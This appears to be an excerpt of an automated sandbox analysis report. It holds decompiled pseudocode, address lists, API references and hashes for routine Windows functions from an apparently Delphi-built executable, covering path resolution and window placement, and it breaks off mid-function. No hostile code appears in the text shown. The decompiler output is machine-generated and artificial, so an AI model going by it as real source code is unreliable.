                                                                        • Opcode ID: 3455c8d4d5cdb2e9cec7868919c55068e8ac0fe47da5793c35daf97f491ef063
                                                                        • Instruction ID: 6af8113a591f14ca49e0fa3a34acdbbadf62191862ecf0bc745c14bc79de69af
                                                                        • Opcode Fuzzy Hash: 3455c8d4d5cdb2e9cec7868919c55068e8ac0fe47da5793c35daf97f491ef063
                                                                        • Instruction Fuzzy Hash: 9A120B71A00218AFDB10EF99D985F9EB7F8EB08315F518456F914EB291C778EE80CB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405AE8, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136stringlibraryfileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E00405AE8(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00405AD4(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00405AD4(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401338();
									while( *_t93 != 0) {
										_t90 = E00405AD4(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401338();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401340();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401338();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401340();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401338();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401338();
						}
					}
				}
				L17:
				return _v16;
			}



















                                                                        0x00405af4
                                                                        0x00405af7
                                                                        0x00405afd
                                                                        0x00405b0a
                                                                        0x00405b0e
                                                                        0x00405b50
                                                                        0x00405b56
                                                                        0x00405b93
                                                                        0x00000000
                                                                        0x00405b58
                                                                        0x00405b5f
                                                                        0x00405b70
                                                                        0x00405b75
                                                                        0x00405b7b
                                                                        0x00405b83
                                                                        0x00405b88
                                                                        0x00405b96
                                                                        0x00405b98
                                                                        0x00405b9e
                                                                        0x00405ba2
                                                                        0x00405ba9
                                                                        0x00405baa
                                                                        0x00405c55
                                                                        0x00405bbc
                                                                        0x00405bc0
                                                                        0x00405bcd
                                                                        0x00405bd4
                                                                        0x00405bd5
                                                                        0x00405bde
                                                                        0x00405bdf
                                                                        0x00405bf7
                                                                        0x00405bfc
                                                                        0x00405bff
                                                                        0x00405c04
                                                                        0x00405c0a
                                                                        0x00405c0b
                                                                        0x00405c1b
                                                                        0x00405c1d
                                                                        0x00405c2d
                                                                        0x00405c34
                                                                        0x00405c3e
                                                                        0x00405c3f
                                                                        0x00405c44
                                                                        0x00405c4a
                                                                        0x00405c4b
                                                                        0x00405c51
                                                                        0x00405c53
                                                                        0x00000000
                                                                        0x00405c53
                                                                        0x00405c1b
                                                                        0x00405bfc
                                                                        0x00000000
                                                                        0x00405bcd
                                                                        0x00405c61
                                                                        0x00405c68
                                                                        0x00405c6c
                                                                        0x00405c6d
                                                                        0x00405c6d
                                                                        0x00405b88
                                                                        0x00405b75
                                                                        0x00405b5f
                                                                        0x00405b10
                                                                        0x00405b1b
                                                                        0x00405b1f
                                                                        0x00000000
                                                                        0x00405b21
                                                                        0x00405b21
                                                                        0x00405b2c
                                                                        0x00405b30
                                                                        0x00405b35
                                                                        0x00000000
                                                                        0x00405b37
                                                                        0x00405b3a
                                                                        0x00405b41
                                                                        0x00405b45
                                                                        0x00405b46
                                                                        0x00405b46
                                                                        0x00405b35
                                                                        0x00405b1f
                                                                        0x00405c72
                                                                        0x00405c7b

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405B05
                                                                        • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405B16
                                                                        • lstrcpyn.KERNEL32(?,?,?,?,00000001,0047A08C,?,00405D48,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405B46
                                                                        • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405BAA
                                                                        • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000,00405DA5,?,80000001), ref: 00405BDF
                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000,00405DA5), ref: 00405BF2
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000), ref: 00405BFF
                                                                        • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48), ref: 00405C0B
                                                                        • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405C3F
                                                                        • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405C4B
                                                                        • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405C6D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                        • String ID: GetLongPathNameA$\$kernel32.dll
                                                                        • API String ID: 3245196872-1565342463
                                                                        • Opcode ID: a0ca131dc62e861f4fed9098179ba15cf9d3b55e4a629aaab9a90f7636454dfe
                                                                        • Instruction ID: 73109fc7617de6927649651d2e73acf26c869defa74ee943d75a78e36df64a33
                                                                        • Opcode Fuzzy Hash: a0ca131dc62e861f4fed9098179ba15cf9d3b55e4a629aaab9a90f7636454dfe
                                                                        • Instruction Fuzzy Hash: D441837190465CABEB10EAA8CC85EDFB7ECDF05304F1401B6B949F7291D678AE408F58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00452974, Relevance: 18.4, APIs: 12, Instructions: 407windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E00452974(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t149;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				struct HWND__* _t166;
				long _t176;
				signed int _t198;
				signed int _t199;
				long _t220;
				intOrPtr _t226;
				int _t231;
				intOrPtr _t232;
				intOrPtr _t241;
				intOrPtr _t245;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr _t252;
				signed int _t258;
				long _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				signed int _t269;
				intOrPtr _t270;
				intOrPtr _t271;
				signed int _t277;
				long _t278;
				intOrPtr _t281;
				signed int _t286;
				signed int _t287;
				long _t290;
				intOrPtr _t294;
				struct HWND__* _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				long _t308;
				signed int _t311;
				signed int _t313;
				long _t314;
				signed int _t317;
				signed int _t318;
				signed int _t326;
				long _t328;
				intOrPtr _t331;
				intOrPtr _t362;
				long _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;

				_t372 = _t373;
				_t374 = _t373 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t372);
				_push(0x452ede);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2ec) & 0x00000004) != 0) {
					_t294 =  *0x495c40; // 0x41d594
					E00406548(_t294,  &_v12);
					E0040A17C(_v12, 1);
					E00403DA8();
				}
				_t149 =  *0x496c04; // 0x2170d40
				E00456F4C(_t149);
				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000004;
				_push(_t372);
				_push(0x452ec1);
				_push( *[fs:edx]);
				 *[fs:edx] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t155 = _v8;
					_t378 =  *((char*)(_t155 + 0x1a6));
					if( *((char*)(_t155 + 0x1a6)) == 0) {
						_push(_t372);
						_push(0x452dc8);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004037D8(_v8, __eflags);
						 *[fs:eax] = 0;
						_t160 =  *0x496c08; // 0x217094c
						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
							__eflags = 0;
							E00451B60(_v8, 0);
						}
						_t162 = _v8;
						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
						if( *((char*)(_t162 + 0x22f)) != 1) {
							_t163 = _v8;
							__eflags =  *(_t163 + 0x2ec) & 0x00000008;
							if(( *(_t163 + 0x2ec) & 0x00000008) == 0) {
								_t299 = 0;
								_t165 = E0043CC2C(_v8);
								_t166 = GetActiveWindow();
								__eflags = _t165 - _t166;
								if(_t165 == _t166) {
									_t176 = IsIconic(E0043CC2C(_v8));
									__eflags = _t176;
									if(_t176 == 0) {
										_t299 = E0044D7A0(E0043CC2C(_v8));
									}
								}
								__eflags = _t299;
								if(_t299 == 0) {
									ShowWindow(E0043CC2C(_v8), 0);
								} else {
									SetWindowPos(E0043CC2C(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t299);
								}
							} else {
								SetWindowPos(E0043CC2C(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E0043A2A8(_v8);
						}
					} else {
						_push(_t372);
						_push(0x452a2c);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004037D8(_v8, _t378);
						 *[fs:eax] = 0;
						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
							if( *((char*)(_v8 + 0x22f)) != 1) {
								_t301 = E004541A4() -  *(_v8 + 0x48);
								__eflags = _t301;
								_t302 = _t301 >> 1;
								if(_t301 < 0) {
									asm("adc ebx, 0x0");
								}
								_t198 = E00454198() -  *(_v8 + 0x4c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t241 =  *0x496c04; // 0x2170d40
								_t305 = E00435FB0( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
								_t302 = _t305 >> 1;
								if(_t305 < 0) {
									asm("adc ebx, 0x0");
								}
								_t245 =  *0x496c04; // 0x2170d40
								_t248 = E00435FF4( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
								_t199 = _t248 >> 1;
								if(_t248 < 0) {
									asm("adc eax, 0x0");
								}
							}
							if(_t302 < 0) {
								_t302 = 0;
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							_t326 = _t199;
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
							if( *((char*)(_v8 + 0x57)) != 0) {
								E00450E14(_v8, _t326);
							}
						} else {
							_t251 =  *((intOrPtr*)(_v8 + 0x230));
							__eflags = _t251 + 0xfa - 2;
							if(_t251 + 0xfa - 2 >= 0) {
								__eflags = _t251 - 5;
								if(_t251 == 5) {
									_t252 = _v8;
									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
									if( *((char*)(_t252 + 0x22f)) != 1) {
										_t307 = E004541D4() -  *(_v8 + 0x48);
										__eflags = _t307;
										_t308 = _t307 >> 1;
										if(_t307 < 0) {
											asm("adc ebx, 0x0");
										}
										_t258 = E004541C8() -  *(_v8 + 0x4c);
										__eflags = _t258;
										_t259 = _t258 >> 1;
										if(_t258 < 0) {
											asm("adc eax, 0x0");
										}
									} else {
										_t262 =  *0x496c04; // 0x2170d40
										_t311 = E00435FB0( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
										__eflags = _t311;
										_t308 = _t311 >> 1;
										if(_t311 < 0) {
											asm("adc ebx, 0x0");
										}
										_t266 =  *0x496c04; // 0x2170d40
										_t269 = E00435FF4( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
										__eflags = _t269;
										_t259 = _t269 >> 1;
										if(_t269 < 0) {
											asm("adc eax, 0x0");
										}
									}
									__eflags = _t308;
									if(_t308 < 0) {
										_t308 = 0;
										__eflags = 0;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_t259 = 0;
										__eflags = 0;
									}
									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								}
							} else {
								_t270 =  *0x496c04; // 0x2170d40
								_t370 =  *(_t270 + 0x44);
								_t271 = _v8;
								__eflags =  *((char*)(_t271 + 0x230)) - 7;
								if( *((char*)(_t271 + 0x230)) == 7) {
									_t362 =  *0x44c130; // 0x44c17c
									_t290 = E00403768( *(_v8 + 4), _t362);
									__eflags = _t290;
									if(_t290 != 0) {
										_t370 =  *(_v8 + 4);
									}
								}
								__eflags = _t370;
								if(_t370 == 0) {
									_t313 = E004541A4() -  *(_v8 + 0x48);
									__eflags = _t313;
									_t314 = _t313 >> 1;
									if(_t313 < 0) {
										asm("adc ebx, 0x0");
									}
									_t277 = E00454198() -  *(_v8 + 0x4c);
									__eflags = _t277;
									_t278 = _t277 >> 1;
									if(_t277 < 0) {
										asm("adc eax, 0x0");
									}
								} else {
									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
									__eflags = _t317;
									_t318 = _t317 >> 1;
									if(_t317 < 0) {
										asm("adc ebx, 0x0");
									}
									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
									__eflags = _t286;
									_t287 = _t286 >> 1;
									if(_t286 < 0) {
										asm("adc eax, 0x0");
									}
									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
								}
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = 0;
									__eflags = 0;
								}
								__eflags = _t278;
								if(_t278 < 0) {
									_t278 = 0;
									__eflags = 0;
								}
								_t328 = _t278;
								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								_t281 = _v8;
								__eflags =  *((char*)(_t281 + 0x57));
								if( *((char*)(_t281 + 0x57)) != 0) {
									E00450E14(_v8, _t328);
								}
							}
						}
						 *((char*)(_v8 + 0x230)) = 0;
						if( *((char*)(_v8 + 0x22f)) != 1) {
							ShowWindow(E0043CC2C(_v8),  *(0x47ab74 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x22b) != 2) {
								ShowWindow(E0043CC2C(_v8),  *(0x47ab74 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
								__eflags = _t220;
								CallWindowProcA(0x406d84, E0043CC2C(_v8), 5, 0, _t220);
								E0043680C();
							} else {
								_t231 = E0043CC2C(_v8);
								_t232 =  *0x496c04; // 0x2170d40
								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
								ShowWindow(E0043CC2C(_v8), 3);
							}
							_t226 =  *0x496c04; // 0x2170d40
							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
						}
					}
				}
				_pop(_t331);
				 *[fs:eax] = _t331;
				_push(0x452ec8);
				_t154 = _v8;
				 *(_t154 + 0x2ec) =  *(_t154 + 0x2ec) & 0x000000fb;
				return _t154;
			}


























































                                                                        0x00452975
                                                                        0x00452977
                                                                        0x0045297f
                                                                        0x00452982
                                                                        0x00452987
                                                                        0x00452988
                                                                        0x0045298d
                                                                        0x00452990
                                                                        0x0045299a
                                                                        0x004529ab
                                                                        0x004529b0
                                                                        0x004529bf
                                                                        0x004529c4
                                                                        0x004529c4
                                                                        0x004529c9
                                                                        0x004529ce
                                                                        0x004529d6
                                                                        0x004529df
                                                                        0x004529e0
                                                                        0x004529e5
                                                                        0x004529e8
                                                                        0x004529f2
                                                                        0x004529f8
                                                                        0x004529fb
                                                                        0x00452a02
                                                                        0x00452da6
                                                                        0x00452da7
                                                                        0x00452dac
                                                                        0x00452daf
                                                                        0x00452db9
                                                                        0x00452dc3
                                                                        0x00452ddf
                                                                        0x00452de7
                                                                        0x00452dea
                                                                        0x00452dec
                                                                        0x00452df1
                                                                        0x00452df1
                                                                        0x00452df6
                                                                        0x00452df9
                                                                        0x00452e00
                                                                        0x00452e0f
                                                                        0x00452e12
                                                                        0x00452e19
                                                                        0x00452e3a
                                                                        0x00452e3f
                                                                        0x00452e46
                                                                        0x00452e4b
                                                                        0x00452e4d
                                                                        0x00452e58
                                                                        0x00452e5d
                                                                        0x00452e5f
                                                                        0x00452e6e
                                                                        0x00452e6e
                                                                        0x00452e5f
                                                                        0x00452e70
                                                                        0x00452e72
                                                                        0x00452ea4
                                                                        0x00452e74
                                                                        0x00452e8c
                                                                        0x00452e92
                                                                        0x00452e92
                                                                        0x00452e1b
                                                                        0x00452e33
                                                                        0x00452e33
                                                                        0x00452e02
                                                                        0x00452e05
                                                                        0x00452e05
                                                                        0x00452a08
                                                                        0x00452a0a
                                                                        0x00452a0b
                                                                        0x00452a10
                                                                        0x00452a13
                                                                        0x00452a1d
                                                                        0x00452a27
                                                                        0x00452a4d
                                                                        0x00452a79
                                                                        0x00452ac2
                                                                        0x00452ac2
                                                                        0x00452ac5
                                                                        0x00452ac7
                                                                        0x00452ac9
                                                                        0x00452ac9
                                                                        0x00452ad9
                                                                        0x00452ad9
                                                                        0x00452adc
                                                                        0x00452ade
                                                                        0x00452ae0
                                                                        0x00452ae0
                                                                        0x00452a7b
                                                                        0x00452a7b
                                                                        0x00452a8d
                                                                        0x00452a90
                                                                        0x00452a92
                                                                        0x00452a94
                                                                        0x00452a94
                                                                        0x00452a97
                                                                        0x00452aa7
                                                                        0x00452aaa
                                                                        0x00452aac
                                                                        0x00452aae
                                                                        0x00452aae
                                                                        0x00452aac
                                                                        0x00452ae5
                                                                        0x00452ae7
                                                                        0x00452ae7
                                                                        0x00452aeb
                                                                        0x00452aed
                                                                        0x00452aed
                                                                        0x00452afd
                                                                        0x00452b06
                                                                        0x00452b13
                                                                        0x00452b1c
                                                                        0x00452b1c
                                                                        0x00452b26
                                                                        0x00452b29
                                                                        0x00452b34
                                                                        0x00452b37
                                                                        0x00452c0b
                                                                        0x00452c0d
                                                                        0x00452c13
                                                                        0x00452c16
                                                                        0x00452c1d
                                                                        0x00452c66
                                                                        0x00452c66
                                                                        0x00452c69
                                                                        0x00452c6b
                                                                        0x00452c6d
                                                                        0x00452c6d
                                                                        0x00452c7d
                                                                        0x00452c7d
                                                                        0x00452c80
                                                                        0x00452c82
                                                                        0x00452c84
                                                                        0x00452c84
                                                                        0x00452c1f
                                                                        0x00452c1f
                                                                        0x00452c31
                                                                        0x00452c31
                                                                        0x00452c34
                                                                        0x00452c36
                                                                        0x00452c38
                                                                        0x00452c38
                                                                        0x00452c3b
                                                                        0x00452c4b
                                                                        0x00452c4b
                                                                        0x00452c4e
                                                                        0x00452c50
                                                                        0x00452c52
                                                                        0x00452c52
                                                                        0x00452c50
                                                                        0x00452c87
                                                                        0x00452c89
                                                                        0x00452c8b
                                                                        0x00452c8b
                                                                        0x00452c8b
                                                                        0x00452c8d
                                                                        0x00452c8f
                                                                        0x00452c91
                                                                        0x00452c91
                                                                        0x00452c91
                                                                        0x00452caa
                                                                        0x00452caa
                                                                        0x00452b3d
                                                                        0x00452b3d
                                                                        0x00452b42
                                                                        0x00452b45
                                                                        0x00452b48
                                                                        0x00452b4f
                                                                        0x00452b57
                                                                        0x00452b5d
                                                                        0x00452b62
                                                                        0x00452b64
                                                                        0x00452b69
                                                                        0x00452b69
                                                                        0x00452b64
                                                                        0x00452b6c
                                                                        0x00452b6e
                                                                        0x00452ba7
                                                                        0x00452ba7
                                                                        0x00452baa
                                                                        0x00452bac
                                                                        0x00452bae
                                                                        0x00452bae
                                                                        0x00452bbe
                                                                        0x00452bbe
                                                                        0x00452bc1
                                                                        0x00452bc3
                                                                        0x00452bc5
                                                                        0x00452bc5
                                                                        0x00452b70
                                                                        0x00452b76
                                                                        0x00452b76
                                                                        0x00452b79
                                                                        0x00452b7b
                                                                        0x00452b7d
                                                                        0x00452b7d
                                                                        0x00452b80
                                                                        0x00452b89
                                                                        0x00452b89
                                                                        0x00452b8c
                                                                        0x00452b8e
                                                                        0x00452b90
                                                                        0x00452b90
                                                                        0x00452b93
                                                                        0x00452b93
                                                                        0x00452bc8
                                                                        0x00452bca
                                                                        0x00452bcc
                                                                        0x00452bcc
                                                                        0x00452bcc
                                                                        0x00452bce
                                                                        0x00452bd0
                                                                        0x00452bd2
                                                                        0x00452bd2
                                                                        0x00452bd2
                                                                        0x00452be2
                                                                        0x00452beb
                                                                        0x00452bf1
                                                                        0x00452bf4
                                                                        0x00452bf8
                                                                        0x00452c01
                                                                        0x00452c01
                                                                        0x00452bf8
                                                                        0x00452b37
                                                                        0x00452cb3
                                                                        0x00452cc4
                                                                        0x00452d9a
                                                                        0x00452cca
                                                                        0x00452cd4
                                                                        0x00452d27
                                                                        0x00452d3b
                                                                        0x00452d3b
                                                                        0x00452d50
                                                                        0x00452d58
                                                                        0x00452cd6
                                                                        0x00452cdb
                                                                        0x00452ce6
                                                                        0x00452cf5
                                                                        0x00452d05
                                                                        0x00452d05
                                                                        0x00452d66
                                                                        0x00452d75
                                                                        0x00452d75
                                                                        0x00452cc4
                                                                        0x00452a02
                                                                        0x00452eab
                                                                        0x00452eae
                                                                        0x00452eb1
                                                                        0x00452eb6
                                                                        0x00452eb9
                                                                        0x00452ec0

                                                                        APIs
                                                                        • SendMessageA.USER32 ref: 00452CF5
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: LoadMessageSendString
                                                                        • String ID:
                                                                        • API String ID: 1946433856-0
                                                                        • Opcode ID: 717acc6c25fd58546519ffb373e4bf667c7c6554064bb9ea9fc5b4701ab0a2bc
                                                                        • Instruction ID: d82fd93d8c37f43bf0d08f362bbfae17662a6fc41c918366e4d92ba17f68ed98
                                                                        • Opcode Fuzzy Hash: 717acc6c25fd58546519ffb373e4bf667c7c6554064bb9ea9fc5b4701ab0a2bc
                                                                        • Instruction Fuzzy Hash: C9F16130A00204EFDB01DFA9CA85B5E77F5AB09305F2540B6E904AB363D779EE45DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043CF3C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 75%
                                                                        			E0043CF3C(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E00435C00(_t43);
			}










                                                                        0x0043cf3f
                                                                        0x0043cf42
                                                                        0x0043cf52
                                                                        0x0043cf81
                                                                        0x0043cf54
                                                                        0x0043cf54
                                                                        0x0043cf68
                                                                        0x0043cf73
                                                                        0x0043cf74
                                                                        0x0043cf75
                                                                        0x0043cf76
                                                                        0x0043cf76
                                                                        0x0043cf99
                                                                        0x0043cfa9
                                                                        0x0043cfad
                                                                        0x0043cfb1
                                                                        0x0043cfbc
                                                                        0x0043cfbc
                                                                        0x0043cfad
                                                                        0x0043cfc4
                                                                        0x0043cfcb
                                                                        0x0043cfd5
                                                                        0x0043cfe0
                                                                        0x0043cff0

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                        • String ID: ,
                                                                        • API String ID: 2266315723-3772416878
                                                                        • Opcode ID: 0e429eb8ffffe6df52a8329525d030c4f3db782929e8d24c94ca2f27c20065be
                                                                        • Instruction ID: 459ab4c7249235b108c54b4c36eddf7638014fb9c7bbac68c80982844e868d89
                                                                        • Opcode Fuzzy Hash: 0e429eb8ffffe6df52a8329525d030c4f3db782929e8d24c94ca2f27c20065be
                                                                        • Instruction Fuzzy Hash: 55117F71504201ABCB01EF6DD8C5A8B77D8AF0D314F04462AFD58EB386D739E9048BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0044A3C8, Relevance: 10.9, APIs: 7, Instructions: 405nativeCOMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E0044A3C8(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				struct HWND__* _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
